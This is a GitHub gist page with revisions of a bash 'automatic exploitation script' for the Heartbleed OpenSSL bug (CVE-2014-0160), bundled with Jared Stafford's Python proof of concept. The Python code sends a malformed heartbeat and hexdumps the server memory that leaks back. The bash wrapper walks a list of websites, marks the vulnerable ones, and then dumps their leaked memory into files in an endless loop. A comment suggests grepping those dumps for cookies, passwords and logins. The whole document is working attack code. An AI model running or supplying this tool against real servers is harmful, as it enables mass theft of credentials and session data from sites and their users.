Last active
August 29, 2015 13:58
-
-
Save initbrain/10153732 to your computer and use it in GitHub Desktop.
Revisions
-
Julien Deudon revised this gist
Apr 9, 2014 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,5 @@ #!/bin/bash # Automatic exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' -
Apr 9, 2014 . 1 changed file with 136 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,136 @@ #!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() -
Apr 8, 2014 . 1 changed file with 52 additions and 11 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,5 @@ #!/bin/bash # Automatic exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' # Stop the script with (yes I know...): ps aux | grep 'ssltest\.sh' | awk '{print $2}' | xargs -x kill -9 @@ -28,13 +28,33 @@ do until [ $status -eq 1 ] || [ $attempt -eq $max_attempt ] do let "attempt=$attempt+1" if echo "$line" | egrep -q ":" ; then arr=$(echo $line | tr ":" "\n") array=() for x in $arr do array=( ${array[*]} $x ) done #echo ${array[0]} ${array[1]} echo "ATTEMPT $attempt/$max_attempt: python ssltest.py ${array[0]} -p ${array[1]}" sslcheck=$(python ssltest.py ${array[0]} -p ${array[1]} 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi else echo "ATTEMPT $attempt/$max_attempt: python ssltest.py $line" sslcheck=$(python ssltest.py $line 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi fi done if [ $status -eq 0 ] @@ -45,12 +65,33 @@ do fi done # Let's make a dump file for eatch vulnerable website filelines=$(cat $filename) i=0 # Read eatch line of the website list while true do for line in $filelines do # If line not start with "#" if ! echo "$line" | grep -lq "^#" then if echo "$line" | egrep -q ":" ; then arr=$(echo $line | tr ":" "\n") array=() for x in $arr do array=( ${array[*]} $x ) done echo ${array[0]} ${array[1]} echo "~> python ssltest.py ${array[0]} -p ${array[1]}" python ssltest.py "${array[0]}" -p "${array[1]}" | tee -a "${array[0]}.txt" else echo "~> python ssltest.py $line" python ssltest.py "$line" | tee -a "$line.txt" fi fi done done -
Apr 8, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,56 @@ #!/bin/bash # Exploitation script - Heartbleed OpenSSL bug CVE-2014-0160 # Using Python PoC from Jared Stafford ([email protected]): http://s3.jspenguin.org/ssltest.py # Check pattern with (for example): tail -f *.txt | egrep -C 5 -i 'cookie|pass|pwd|login' # Stop the script with (yes I know...): ps aux | grep 'ssltest\.sh' | awk '{print $2}' | xargs -x kill -9 filename='ssltest_website_list.txt' # Website list (one per line) max_attempt=3 # Maximum number of attempt # Sort and remove duplicate lines echo -n "$(sort $filename | uniq -u | grep -v '^$')" > $filename filelines=$(cat $filename) i=0 # Read eatch line of the website list for line in $filelines do # Calculate line number let "i=$i+1" # If line not start with "#" if ! echo "$line" | grep -lq "^#" then # Check website echo "[+] Check $line (line $i)" status=0 attempt=0 # Check until max attempt reatched or vuln found until [ $status -eq 1 ] || [ $attempt -eq $max_attempt ] do let "attempt=$attempt+1" echo "ATTEMPT $attempt/$max_attempt" sslcheck=$(python ssltest.py $line 2>&1) wcl=$(echo "$sslcheck" | wc -l) if [ $wcl -gt 100 ] then status=1 echo "IS VULN !!!" fi done if [ $status -eq 0 ] then echo "NOT VULN..." sed -i "s/^$line/#$line/" $filename fi fi done # Let's make a dump file for eatch vulnerable website vuln_website="$(sort $filename | uniq -u | grep -v '^#')" while true do for site in $vuln_website do python ssltest.py "$site" | tee -a "$site.txt" done done
Julien Deudon
revised
this gist